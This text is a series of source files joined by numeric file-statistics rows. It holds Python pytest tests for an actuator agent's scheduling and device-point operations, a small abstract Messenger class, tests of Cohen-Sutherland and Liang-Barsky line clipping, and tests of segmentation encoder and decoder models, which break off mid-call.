:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
print ("\n**** test_schedule_conflict_self ****")
# used by cancel_schedules
taskid = 'task_self_conflict'
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver1', start, end],
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
TEST_AGENT,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
print result
assert result['result'] == FAILURE
assert result['info'] == 'REQUEST_CONFLICTS_WITH_SELF'
@pytest.mark.actuator
def test_schedule_conflict(publish_agent, cancel_schedules):
"""
Test schedule conflict with existing schdeule
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end of
test so that other tests can use the same device and time slot
"""
print ("\n**** test_schedule_conflict ****")
# set agentid and task id for cancel_schedules fixture
agentid = TEST_AGENT
taskid = 'task_conflict1'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=2))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
print result
assert result['result'] == SUCCESS
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
TEST_AGENT,
'task_conflict2',
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == 'CONFLICTS_WITH_EXISTING_SCHEDULES'
@pytest.mark.actuator
def test_schedule_overlap_success(publish_agent, cancel_schedules):
"""
Test schedule where stop time of one requested time slot is the same as
start time of another requested time slot.
Expected Result : SUCCESS
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_schedule_overlap_success ****")
# set agentid and task id for cancel_schedules fixture
agentid = TEST_AGENT
taskid = 'task_overlap'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
end2 = str(datetime.now() + timedelta(seconds=2))
msg = [
['fakedriver0', start, end],
['fakedriver0', end, end2]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
@pytest.mark.actuator
def test_cancel_error_invalid_taskid(publish_agent):
"""
Test error responses for schedule request. Test invalid task id
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance
of Agent object used for publishing
"""
print ("\n**** test_cancel_error_invalid_taskid ****")
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_CANCEL_SCHEDULE,
TEST_AGENT,
'invalid_cancel',
).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == 'TASK_ID_DOES_NOT_EXIST'
@pytest.mark.actuator
def test_cancel_error_taskid_agentid_mismatch(publish_agent, cancel_schedules):
"""
Test error responses for schedule request. Test invalid task id
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_cancel_error_taskid_agentid_mismatch ****")
agentid = TEST_AGENT
taskid = 'invalid_cancel'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=2))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_CANCEL_SCHEDULE,
'invalid_agent_for_task',
taskid,
).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == 'AGENT_ID_TASK_ID_MISMATCH'
@pytest.mark.actuator
def test_cancel_success(publish_agent):
"""
Test successful schedule cancel
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
print ("\n**** test_cancel_success ****")
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=2))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
TEST_AGENT,
'cancel_success',
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_CANCEL_SCHEDULE,
TEST_AGENT,
'cancel_success',
).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
@pytest.mark.actuator
def test_get_default(publish_agent):
"""
Test get default value of a point
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
print ("\n**** test_get_default ****")
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'get_point', # Method
'fakedriver1/SampleWritableFloat1' # point
).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result == 10.0
@pytest.mark.actuator
def test_get_success(publish_agent, cancel_schedules):
"""
Test getting a float value of a point through pubsub
Expected Result - value of the point
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at
the end of test so that other tests can use the same device and time slot
"""
print ("\n**** test_get_value_success ****")
agentid = TEST_AGENT
taskid = 'task_set_and_get'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=2))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'set_point', # Method
agentid, # Requestor
'fakedriver1/SampleWritableFloat1', # Point to set
1.0 # New value
).get(timeout=10)
assert result == 1.0
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'get_point', # Method
'fakedriver1/SampleWritableFloat1' # point
).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result == 1.0
@pytest.mark.actuator
def test_get_error_invalid_point(publish_agent):
"""
Test getting a float value of a point through pubsub with invalid point
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
print ("\n**** test_get_error_invalid_point ****")
try:
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'get_point', # Method
'fakedriver1/SampleWritableFloat123').get(timeout=10)
pytest.fail('Expecting RemoteError for accessing invalid point. '
'Code returned {}'.format(result))
except RemoteError as e:
assert e.message.find(
'Point not configured on device: SampleWritableFloat123') != -1
@pytest.mark.actuator
def test_set_value_float(publish_agent, cancel_schedules, revert_devices):
"""
Test setting a float value of a point through rpc
Expected result = value of the actuation point
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_set_float_value ****")
taskid = 'task_set_float_value'
agentid = TEST_AGENT
device = 'fakedriver0'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
revert_devices.append({'agentid': agentid, 'device': device})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=2))
msg = [
[device, start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'set_point', # Method
agentid, # Requestor
'fakedriver0/SampleWritableFloat1', # Point to set
2.5 # New value
).get(timeout=10)
assert result == 2.5
@pytest.mark.actuator
def test_revert_point(publish_agent, cancel_schedules):
"""
Test setting a float value of a point through rpc
Expected result = value of the actuation point
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_set_float_value ****")
taskid = 'test_revert_point'
agentid = TEST_AGENT
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=2))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
initial_value = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'get_point', # Method
'fakedriver0/SampleWritableFloat1', # Point to get
).get(timeout=10)
test_value = initial_value + 1.0
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'set_point', # Method
agentid, # Requestor
'fakedriver0/SampleWritableFloat1', # Point to set
test_value # New value
).get(timeout=10)
assert result == test_value
publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'revert_point', # Method
agentid, # Requestor
'fakedriver0/SampleWritableFloat1' # Point to revert
).get(timeout=10)
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'get_point', # Method
'fakedriver0/SampleWritableFloat1', # Point to get
).get(timeout=10)
# Value taken from fake_unit_testing.csv
assert result == initial_value
@pytest.mark.actuator
def test_revert_device(publish_agent, cancel_schedules):
"""
Test setting a float value of a point through rpc
Expected result = value of the actuation point
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_set_float_value ****")
taskid = 'test_revert_point'
agentid = TEST_AGENT
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=2))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
initial_value = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'get_point', # Method
'fakedriver0/SampleWritableFloat1', # Point to get
).get(timeout=10)
test_value = initial_value + 1.0
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'set_point', # Method
agentid, # Requestor
'fakedriver0/SampleWritableFloat1', # Point to set
test_value # New value
).get(timeout=10)
assert result == test_value
publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'revert_device', # Method
agentid, # Requestor
'fakedriver0' # Point to revert
).get(timeout=10)
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'get_point', # Method
'fakedriver0/SampleWritableFloat1', # Point to get
).get(timeout=10)
# Value taken from fake_unit_testing.csv
assert result == initial_value
@pytest.mark.actuator
def test_set_error_array(publish_agent, cancel_schedules):
"""
Test setting a array of single float value of a point. Should return
type error
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_set_error_array ****")
# set agentid and task id for cancel_schedules fixture
agentid = TEST_AGENT
taskid = 'task_set_float_array_value'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=2))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
try:
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'set_point', # Method
agentid, # Requestor
'fakedriver0/SampleWritableFloat1', # Point to set
[2.5] # New value
).get(timeout=10)
pytest.fail('Expecting RemoteError for trying to set array on point '
'that expects float. Code returned {}'.format(result))
except RemoteError as e:
assert e.message == \
"TypeError('float() argument must be a string or a number')"
@pytest.mark.actuator
def test_set_lock_error(publish_agent):
"""
Test setting a float value of a point through rpc without an allocation
Expected result
Remote Error with message 'caller does not have this lock'
'type': 'LockError'
'value':
}
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
try:
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'set_point', # Method
TEST_AGENT, # Requestor
'fakedriver1/SampleWritableFloat1', # Point to set
'2.5' # New value
).get(timeout=10)
pytest.fail('Expecting LockError. Code returned: {}'.format(result))
except RemoteError as e:
assert e.exc_info['exc_type'] == 'actuator.agent.LockError'
assert e.message == 'caller ({}) does not have this lock'.format(
TEST_AGENT)
@pytest.mark.actuator
def test_set_value_error(publish_agent, cancel_schedules):
"""
Test setting a wrong type value of a point through rpc
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_set_value_error ****")
agentid = TEST_AGENT
taskid = 'task_set_value_error'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=2))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
try:
result = publish_agent.vip.rpc.call(
'platform.actuator', # Target agent
'set_point', # Method
agentid, # Requestor
'fakedriver0/SampleWritableFloat1', # Point to set
'On').get(timeout=10)
pytest.fail(
"Expecting ValueError but code returned: {}".format(result))
except RemoteError as e:
assert e.message == "ValueError('could not convert string to float: " \
"On')"
@pytest.mark.actuator
def test_set_error_none_agent(publish_agent, cancel_schedules):
"""
Test setting a value of a point through rpc with agentid=None
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_set_error_none_agent ****")
agentid = TEST_AGENT
taskid = 'task_set_none_agent'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=2))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
try:
result = publish_agent.vip.rpc.call(
'platform.actuator', # Target agent
'set_point', # Method
None, # Requestor
'fakedriver0/SampleWritableFloat1', # Point to set
'On' # New value
).get(timeout=10)
pytest.fail(
"Expecting value error but code returned: {}".format(result))
except RemoteError as e:
assert e.message == 'Agent id must be a nonempty string'
assert e.exc_info['exc_type'] == 'TypeError'
@pytest.mark.actuator
def test_set_error_read_only_point(publish_agent, cancel_schedules):
"""
Test setting a value of a read only point through pubsub
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_set_read_only_point ****")
agentid = TEST_AGENT
taskid = 'task_set_readonly_point'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=2))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
try:
result = publish_agent.vip.rpc.call(
'platform.actuator', # Target agent
'set_point', # Method
agentid, # Requestor
'fakedriver0/OutsideAirTemperature1', # Point to set
1.2 # New value
).get(timeout=10)
pytest.fail(
'Expecting RemoteError but code returned: {}'.format(result))
except RemoteError as e:
assert e.message == "IOError('Trying to write to a point configured " \
"read only: OutsideAirTemperature1')"
| 35.455114
| 79
| 0.665694
| 7,718
| 62,401
| 5.232573
| 0.067634
| 0.055268
| 0.024514
| 0.027188
| 0.839148
| 0.818324
| 0.800272
| 0.778705
| 0.761842
| 0.750303
| 0
| 0.010581
| 0.238217
| 62,401
| 1,759
| 80
| 35.47527
| 0.838985
| 0.148059
| 0
| 0.767906
| 0
| 0
| 0.167238
| 0.053062
| 0
| 0
| 0
| 0
| 0.119674
| 0
| null | null | 0
| 0.007253
| null | null | 0.074343
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
032b3bde681d942c2cc2a9c0479062ee25a714a4
| 344
|
py
|
Python
|
pySPACE/environments/live/communication/messenger.py
|
pyspace/pyspace
|
763e62c0e7fa7cfcb19ccee1a0333c4f7e68ae62
|
[
"BSD-3-Clause"
] | 32
|
2015-02-20T09:03:09.000Z
|
2022-02-25T22:32:52.000Z
|
pySPACE/environments/live/communication/messenger.py
|
pyspace/pyspace
|
763e62c0e7fa7cfcb19ccee1a0333c4f7e68ae62
|
[
"BSD-3-Clause"
] | 5
|
2015-05-18T15:08:40.000Z
|
2020-03-05T19:18:01.000Z
|
pySPACE/environments/live/communication/messenger.py
|
pyspace/pyspace
|
763e62c0e7fa7cfcb19ccee1a0333c4f7e68ae62
|
[
"BSD-3-Clause"
] | 18
|
2015-09-28T07:16:38.000Z
|
2021-01-20T13:52:19.000Z
|
import abc
class Messenger(object):
__metaclass__ = abc.ABCMeta
def __init__(self):
pass
@abc.abstractmethod
def register(self):
return
@abc.abstractmethod
def end_transmission(self):
return
@abc.abstractmethod
def send_message(self,message):
return
| 16.380952
| 35
| 0.593023
| 33
| 344
| 5.878788
| 0.545455
| 0.262887
| 0.309278
| 0.278351
| 0.309278
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.337209
| 344
| 21
| 36
| 16.380952
| 0.850877
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0.071429
| 0.071429
| 0.214286
| 0.714286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
3060c4ae4db9e7c5a7dcf28973a97c8f7d97c018
| 2,634
|
py
|
Python
|
tests/test_clipping.py
|
cchenzi/INE5420
|
b14b22b1400e21b4b722d427e1f1375778c5929c
|
[
"MIT"
] | 2
|
2021-06-24T04:31:37.000Z
|
2021-06-24T19:35:15.000Z
|
tests/test_clipping.py
|
cchenzi/INE5420
|
b14b22b1400e21b4b722d427e1f1375778c5929c
|
[
"MIT"
] | null | null | null |
tests/test_clipping.py
|
cchenzi/INE5420
|
b14b22b1400e21b4b722d427e1f1375778c5929c
|
[
"MIT"
] | 1
|
2021-06-24T21:26:36.000Z
|
2021-06-24T21:26:36.000Z
|
import numpy as np
import pytest
from numpy.testing import assert_array_equal, assert_allclose
from app.clipping import cohen_sutherland, liang_barsky
def test_cohen_sutherland_both_out():
is_visible, _, _ = cohen_sutherland((-1.2, -1.2), (1.2, -1.2))
expected_result = False
assert is_visible == expected_result
def test_cohen_sutherland_both_in():
is_visible, _, _ = cohen_sutherland((-0.2, -0.2), (1, -1))
expected_result = True
assert is_visible == expected_result
def test_cohen_sutherland_left_out_right_in():
is_visible, (x0, y0), (x1, y1) = cohen_sutherland((-1.2, -1), (1, -1))
expected_result_visibility = True
assert is_visible == expected_result_visibility
assert (x0, y0) == (-1, -1)
assert (x1, y1) == (1, -1)
def test_cohen_sutherland_right_out_left_in():
is_visible, (x0, y0), (x1, y1) = cohen_sutherland((0, 0), (1.2, -1.2))
expected_result_visibility = True
assert is_visible == expected_result_visibility
assert (x0, y0) == (0, 0)
assert (x1, y1) == (1, -1)
def test_cohen_sutherland_top_out_left_out():
is_visible, (x0, y0), (x1, y1) = cohen_sutherland((0, 1.2), (1.2, 0.8))
expected_result_visibility = True
assert is_visible == expected_result_visibility
assert (x0, y0) == (0.6, 1)
assert (x1, y1) == (1, 0.8666666666666667)
def test_liang_barsky_both_out():
is_visible, _, _ = liang_barsky((-1.2, -1.2), (1.2, -1.2))
expected_result = False
assert is_visible == expected_result
def test_liang_barsky_both_in():
is_visible, (x0, y0), (x1, y1) = liang_barsky((-0.2, -0.2), (1, -1))
expected_result = True
assert is_visible == expected_result
assert (x0, y0) == (-0.2, -0.2)
assert (x1, y1) == (1, -1)
def test_liang_barsky_left_out_right_in():
is_visible, (x0, y0), (x1, y1) = liang_barsky((-1.2, -1), (1, -1))
expected_result_visibility = True
assert is_visible == expected_result_visibility
assert (x0, y0) == (-1, -1)
assert_allclose((x1, y1), (1, -1), rtol=1e-5, atol=0)
# assert (x1, y1) == (1, -1)
def test_liang_barsky_right_out_left_in():
is_visible, (x0, y0), (x1, y1) = liang_barsky((0, 0), (1.2, -1.2))
expected_result_visibility = True
assert is_visible == expected_result_visibility
assert (x0, y0) == (0, 0)
assert (x1, y1) == (1, -1)
def test_liang_barsky_top_out_left_out():
is_visible, (x0, y0), (x1, y1) = liang_barsky((0, 1.2), (1.2, 0.8))
expected_result_visibility = True
assert is_visible == expected_result_visibility
assert (x0, y0) == (0.6, 1)
assert (x1, y1) == (1, 0.8666666666666667)
| 32.925
| 75
| 0.656036
| 406
| 2,634
| 3.945813
| 0.1133
| 0.11236
| 0.022472
| 0.024969
| 0.865793
| 0.80774
| 0.80774
| 0.80774
| 0.80774
| 0.697253
| 0
| 0.089127
| 0.186409
| 2,634
| 79
| 76
| 33.341772
| 0.658423
| 0.009871
| 0
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.431034
| 1
| 0.172414
| false
| 0
| 0.068966
| 0
| 0.241379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0653eb50eef4605592c9a553cacd35e657e3fb21
| 8,755
|
py
|
Python
|
tests/test_models.py
|
edornd/multimodal-icl
|
f79bfa73665db471c12ee9cb57bbee1bcabb0467
|
[
"MIT"
] | 6
|
2021-12-08T05:58:18.000Z
|
2021-12-29T09:55:32.000Z
|
tests/test_models.py
|
edornd/multimodal-icl
|
f79bfa73665db471c12ee9cb57bbee1bcabb0467
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
edornd/multimodal-icl
|
f79bfa73665db471c12ee9cb57bbee1bcabb0467
|
[
"MIT"
] | null | null | null |
import logging
from functools import partial
import torch
from torch import nn
from inplace_abn.abn import InPlaceABN
from saticl.models import create_decoder, create_encoder
from saticl.models.icl import ICLSegmenter
from saticl.tasks import Task
LOG = logging.getLogger(__name__)
def test_encoder_resnet_unet():
model = create_encoder(name="resnet50",
decoder="unet",
pretrained=False,
output_stride=16,
freeze=False,
act_layer=nn.ReLU,
norm_layer=nn.BatchNorm2d)
channels = model.feature_info.channels()
reduction = model.feature_info.reduction()
LOG.debug("channels: %s", str(channels))
LOG.debug("reduct.: %s", str(reduction))
out = model(torch.rand(1, 3, 256, 256))
# check that the output is indeed a list of 5 tensors
assert len(out) == 5
# check that the channels and reductions are consistent
for y, c, r in zip(out, channels, reduction):
LOG.debug("%s", str(y.shape))
assert y.shape[1] == c
assert r == (256 // y.shape[-1])
def test_encoder_resnet_deeplab():
model = create_encoder(name="resnet50",
decoder="deeplabv3",
pretrained=False,
output_stride=16,
freeze=False,
act_layer=nn.ReLU,
norm_layer=nn.BatchNorm2d)
channels = model.feature_info.channels()
reduction = model.feature_info.reduction()
LOG.debug("channels: %s", str(channels))
LOG.debug("reduct.: %s", str(reduction))
out = model(torch.rand(1, 3, 256, 256))
# check that the output is indeed a list of 1 tensor
assert len(out) == 1
# check that the channels and reductions are consistent
for y, c, r in zip(out, channels, reduction):
LOG.debug("%s", str(y.shape))
assert y.shape[1] == c
assert r == (256 // y.shape[-1])
def test_encoder_resnet_deeplabv3plus():
model = create_encoder(name="resnet50",
decoder="deeplabv3p",
pretrained=False,
output_stride=16,
freeze=False,
act_layer=nn.ReLU,
norm_layer=nn.BatchNorm2d)
channels = model.feature_info.channels()
reduction = model.feature_info.reduction()
LOG.debug("channels: %s", str(channels))
LOG.debug("reduct.: %s", str(reduction))
out = model(torch.rand(1, 3, 256, 256))
# check that the output is indeed a list of 2 tensors
assert len(out) == 2
# check that the channels and reductions are consistent
for y, c, r in zip(out, channels, reduction):
LOG.debug("%s", str(y.shape))
assert y.shape[1] == c
assert r == (256 // y.shape[-1])
def test_encoder_tresnet_unet():
model = create_encoder(name="tresnet_m",
decoder="unet",
pretrained=False,
output_stride=16,
freeze=False,
act_layer=nn.ReLU,
norm_layer=nn.BatchNorm2d)
channels = model.feature_info.channels()
reduction = model.feature_info.reduction()
LOG.debug("channels: %s", str(channels))
LOG.debug("reduct.: %s", str(reduction))
out = model(torch.rand(1, 3, 256, 256))
# check that the output is indeed a list of 5 tensors
assert len(out) == 4
# check that the channels and reductions are consistent
for y, c, r in zip(out, channels, reduction):
LOG.debug("%s", str(y.shape))
assert y.shape[1] == c
assert r == (256 // y.shape[-1])
def test_decoder_resnet_unet():
enc = create_encoder(name="resnet50",
decoder="unet",
pretrained=False,
output_stride=16,
freeze=False,
act_layer=nn.ReLU,
norm_layer=nn.BatchNorm2d)
dec = create_decoder(name="unet", feature_info=enc.feature_info, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
inp = torch.rand(1, 3, 256, 256)
out = enc(inp)
assert len(out) == 5
out = dec(out)
assert out.shape == (1, dec.output(), 256, 256)
LOG.debug("shape: %s", str(out.shape))
def test_decoder_tresnet_unet():
enc = create_encoder(name="tresnet_m",
decoder="unet",
pretrained=False,
output_stride=16,
freeze=False,
act_layer=nn.ReLU,
norm_layer=nn.BatchNorm2d)
dec = create_decoder(name="unet", feature_info=enc.feature_info, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
inp = torch.rand(1, 3, 256, 256)
out = enc(inp)
assert len(out) == 4
out = dec(out)
assert out.shape == (1, dec.output(), 256, 256)
LOG.debug("shape: %s", str(out.shape))
def test_decoder_tresnet_unet_iabn():
enc = create_encoder(name="tresnet_m",
decoder="unet",
pretrained=False,
output_stride=16,
freeze=False,
act_layer=nn.ReLU,
norm_layer=nn.BatchNorm2d)
iabn = partial(InPlaceABN, activation="leaky_relu", activation_param=0.01)
dec = create_decoder(name="unet", feature_info=enc.feature_info, act_layer=nn.Identity, norm_layer=iabn)
inp = torch.rand(1, 3, 256, 256)
out = enc(inp)
assert len(out) == 4
out = dec(out)
assert out.shape == (1, dec.output(), 256, 256)
LOG.debug("shape: %s", str(out.shape))
def test_icl_model_resnet_unet_step_0():
enc = create_encoder(name="resnet50",
decoder="unet",
pretrained=False,
output_stride=16,
freeze=False,
act_layer=nn.ReLU,
norm_layer=nn.BatchNorm2d)
dec = create_decoder(name="unet", feature_info=enc.feature_info, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
# extract intermediate features when encoder KD is required
extract_features = True
task = Task(name="222a", dataset="potsdam", step=0)
icl_model = ICLSegmenter(enc, dec, classes=task.num_classes_per_task(), return_features=extract_features)
# we do not expect old classifiers at step 1
assert len(icl_model.classifiers) == 1
inp = torch.rand(1, 3, 256, 256)
# should be composed of two pieces given extract features = True
out = icl_model(inp)
assert len(out) == 2
out, (enc_features, dec_features) = out
assert out.shape == (1, 2, 256, 256)
assert dec_features.shape == (1, dec.output(), 256, 256)
assert len(enc_features) == 5
def test_icl_model_resnet_unet_step_1():
enc = create_encoder(name="resnet50",
decoder="unet",
pretrained=False,
output_stride=16,
freeze=False,
act_layer=nn.ReLU,
